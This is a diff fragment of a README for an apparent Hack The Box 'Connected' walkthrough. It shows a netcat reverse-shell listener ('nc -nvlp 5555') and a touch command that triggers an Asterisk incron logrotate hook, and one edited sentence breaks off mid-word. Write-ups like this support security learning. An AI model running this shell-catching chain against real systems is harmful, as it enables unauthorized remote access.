Collinformatics/HTB-Connected/README.md

 	$ echo $hash

-Setup listener on
+Setup listener on your machine:

 	$ nc -nvlp 5555

-Now we can trigger the logrotate hook:
+Now we can trigger the logrotate hook, which will con:

 	$ touch /var/spool/asterisk/incron/ucp.logrotate